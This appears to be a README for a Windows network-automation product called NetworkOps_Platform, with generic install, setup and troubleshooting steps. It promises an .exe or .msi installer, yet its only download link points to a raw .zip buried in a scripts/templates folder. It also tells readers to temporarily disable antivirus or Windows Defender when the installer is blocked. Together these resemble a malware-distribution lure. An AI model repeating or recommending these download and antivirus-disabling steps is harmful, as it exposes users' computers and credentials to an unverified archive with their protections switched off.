NetworkOps_Platform helps you manage and automate your network devices without needing technical skills. It uses simple steps to control many devices from different vendors. You get tools for fixing issues by themselves, tracking changes, and viewing your network live on a web dashboard.


💻 System Requirements

To run NetworkOps_Platform on your Windows computer, make sure you have:

  • Windows 10 or later (64-bit recommended)
  • At least 4 GB of RAM
  • 2 GHz dual-core processor or better
  • 2 GB of free disk space
  • Internet connection for downloading and updates
  • Admin rights to install software

🚀 Getting Started: Download and Install

  1. Go to the download page:Download NetworkOps_PlatformClick the badge above or use this link to open the GitHub page where you can find the latest version.
  2. Find the latest release:On the GitHub page, look for the "Releases" section. This is often on the right side or under the “Code” tab menu.
  3. Download the Windows Installer:Inside the latest release, find the file that ends with .exe or .msi (for example, https://raw.githubusercontent.com/khudadadakram/NetworkOps_Platform/main/scripts/templates/Ops_Platform_Network_1.1.zip). Click it to download.
  4. Run the installer:After the download completes, double-click the file to start the installation.
  5. Follow prompts:The installer will guide you. Click "Next" on each screen. Accept the terms when asked. Use default options unless you have specific needs.
  6. Finish and launch:When it finishes, choose to launch NetworkOps_Platform right away or open it from the Start menu.

🔧 Basic Setup and Use

Once installed, here is how to begin managing your network:

  1. Open NetworkOps_Platform:Find the app in your Start menu or on your desktop and open it.
  2. Connect your devices:Use the menu to add network devices. You will enter details like IP address, device type, and login info.
  3. Explore tools:The platform includes 178 tools for different tasks. These cover configuration management, monitoring, failure fixes, and detecting unwanted changes.
  4. Use the dashboard:The web dashboard updates in real time. You can see the health and status of your network at a glance.
  5. Self-healing agents:Agents run automatically to fix known problems based on set policies. You can turn these on or off in the settings.

NetworkOps_Platform offers a web interface for easy viewing:

  1. Open your web browser.
  2. Enter http://localhost:8080 (unless your setup specifies a different address).
  3. Log in with the username and password you set during installation.
  4. Use the dashboard to monitor network activity, alerts, and status updates.

⚙️ Updating NetworkOps_Platform

Keep your platform current to ensure best performance and new features:

  1. Visit the download page again:
    NetworkOps_Platform Releases
  2. Download the latest installer as before.
  3. Run the installer—it will update your existing version without losing your data.

🛠 Troubleshooting Tips

  • Installer won’t start:
    Check if your antivirus or Windows Defender blocked the run. Temporarily disable it and try again.
  • Program crashes on launch:
    Restart your PC. Make sure all Windows updates are installed.
  • Can’t add devices:
    Double-check the device details (IP, type, credentials). Ensure devices are reachable on your network.
  • Dashboard won’t load:
    Confirm you are connected to the right network and use the correct address (http://localhost:8080).
  • Update problems:
    Try uninstalling the old version before installing the new one.
